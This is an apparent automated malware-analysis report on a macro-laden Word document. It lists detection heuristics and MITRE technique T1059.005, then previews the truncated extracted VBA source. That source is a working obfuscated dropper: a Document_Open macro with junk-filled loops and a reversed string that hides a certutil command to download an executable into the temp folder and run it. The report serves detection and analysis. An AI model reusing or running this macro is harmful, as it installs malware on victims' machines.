MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open auto-execution macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature. The VBA code appears to be obfuscated, but the presence of Shell() and the auto-execution macro strongly suggest a downloader or dropper functionality.
Heuristics 6
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31924 bytes |
SHA-256: b3274a98ab866724df4190d0f787b1edf3eaf281bdf47f7df873f91f75ca5363 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim klqLwbEy As String
zfJTAzB = Space(5)
wiYwk = LTrim("oehIXP%L)tM")
cDOhFqbS = RTrim("I^irYbRyp$F*tQLJ*")
While pJzBOY < 384
mbMVEt = RTrim("OKV&Np_qV-DmCeT(nFI")
wDckaqpW = RTrim("_.T-d Y^gD$X]? Vdwf")
lSrgni = 764 + 1489 + 158
XseVJ = Right("pVJh !fT@iGtxaOJs", 2)
cDOhFqbS = UCase("vMW#NA]_RwcHbb")
zfJTAzB = 1458 - 265 - 1339
PQYbJT = "If?*Q#eW*_r$Z(@U." + "fHX$eLLHp@[OUJbYS-Ey" + "X[X]n]#DPDbf@b"
pJzBOY = pJzBOY + 2
Wend
ejfGsI = Left("M%xU$hAiOWgCDgkYi!t)", 3)
zfJTAzB = Left("_)sZexm.DYCjpc@Dz", 2)
cDOhFqbS = Left("XAWxjPooZxGQXdN", 3)
mbMVEt = 1225 + 764 + 1984
klqLwbEy = StrReverse("QeTxXeF.hIOBQXpiLDvCUez\#\k%]pumae-to%U o&E&^ EeZxYeE.FI.BfXgi[DsCSez\L\v%lpJmoeet$%A Se[xleG.ad%oxodgO/#sZuf.UocrCpasWr(eibPmDuel pU/^/^:TpPtkt.h] bfm-W Ot*iSlGpHs)-W -eDh(czaTc$lRrNuM-p seUx_eQ.MllintWuit$raeacR Jcn/I ZeWxlew.rdBmWc")
zfJTAzB = "fnCsnsvaat#" + "xPGsi[?d#-" + "JynQ@EZUCAsl"
LNnev = UCase("FT##EC$p@S")
wDckaqpW = LTrim("Cs?b%*_%NzNSim%fp)n")
zfJTAzB = "fTWce^CJ_n" + "hhdax@TPc$aHYpTP" + "VWWe#*Zd*[A"
For KHJakJ = 0 To 38
ejfGsI = Right("tUnFjOZ#PcKlVR$@SxoF", 4)
ejfGsI = "?ZgGlWcG]jOLp" + "jM&DQ?fclg_DaYysp$P" + "O_pRrCd!$D"
PQYbJT = Left("N$WfRDbwLHBf", 2)
iPHNO = "k*vXHUe?Dzrdec]^Ke]_" + "$cSKBFE J[EvF&%J" + "AdfME&ogumo%a"
MNqxhB = LTrim("L.GFRCVk_DeI")
lSrgni = "EeGicTrkK@T" + "Uu]VBCctQP-lC^!o" + "FnjL!u&qL#"
iPHNO = RTrim("(?i v kk^&")
XseVJ = Left("vkTI.LzUFklp&cM", 4)
lSrgni = UCase("Y_@ph)HpUYvzqT-o")
LNnev = UCase("xQ qRmR$%!K(SLvg")
Next KHJakJ
While INQiYd < 400
mbMVEt = LTrim("C_PcI bDNW.^JH*k")
wDckaqpW = UCase("I WIpmDy L&(_-_?")
LNnev = "dRne#ZaQXB*Y*TtV" + "Nib[TKHW#U_TYY" + "CgxI-$HyO(YR!uw?"
INQiYd = INQiYd + 1
Wend
lSrgni = 1388 + 1704 + 1411
mbMVEt = LTrim("Raw&p$U(MpqQe_")
While NQiVJ < 641
For zDouyj = 0 To 366
XseVJ = LTrim("no_-CiH#ZCxHJmon@I")
zfJTAzB = LTrim("O(AY[siMKb")
MNqxhB = 1117 - 170 - 963
iPHNO = LTrim("DV)bWHK[rwSmL*-")
MNqxhB = "IkVba_PKaZOt#u]uf(" + "TZwcCCqM?@cldUJegh" + "tbVFVx@?lE*fZ F-m"
Next zDouyj
PQYbJT = "BOzv%MdIMGgSNRF&)" + "sz_wc#hogsH^Mrc$Q" + "iFybP[OR?ORbZ"
LNnev = RTrim("hNhT&@.[KBqVDydLPh.)")
While QEGpqM < 118
lSrgni = Right("-WBHBk%$O%^vG#cLEph", 3)
MNqxhB = 1501 - 414 - 1425
wDckaqpW = Right("kf[ldPiR#vD*fXpQq", 2)
LNnev = Right("_PzgttmyUEV_&)", 4)
LNnev = RTrim("b%uibD[Ny$i")
iPHNO = Right("BrUjpY!Le)dX.]", 3)
XseVJ = 289 + 639 + 940
QEGpqM = QEGpqM + 3
Wend
mbMVEt = LTrim("d!P#eWJo@ekEP%.N$W)q")
For VXiNDv = 0 To 213
lSrgni = UCase("@QxpNqa ok hQZdE")
lSrgni = UCase(".GHDAo!pWiZt")
LNnev = LTrim("?Fl%^@bQLyU!y")
iPHNO = 767 - 801 - 741
ejfGsI = UCase("rmC[J[Vp$ny")
ejfGsI = 1126 + 1394 + 1262
wiYwk = LTrim("-SzKtvrGMVqDHeS^_mI-")
lSrgni = Right("!(L&PmDBamSP", 5)
Next VXiNDv
cDOhFqbS = Left("BXQRZL^aDUb(", 5)
ejfGsI = 134 - 1367 - 893
zfJTAzB = 652 + 790 + 252
iPHNO = 1825 + 273 + 1809
If NQiVJ = 558 Then
mbMVEt = Right("**nWYunP)? q?XLav", 2)
XseVJ = RTrim("Y*#EVZf%rJ")
PQYbJT = UCase("Do-uXAHc*nwOg^eu.#G")
While ouaVtt < 177
zfJTAzB = Space(14)
MNqxhB = 763 -
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.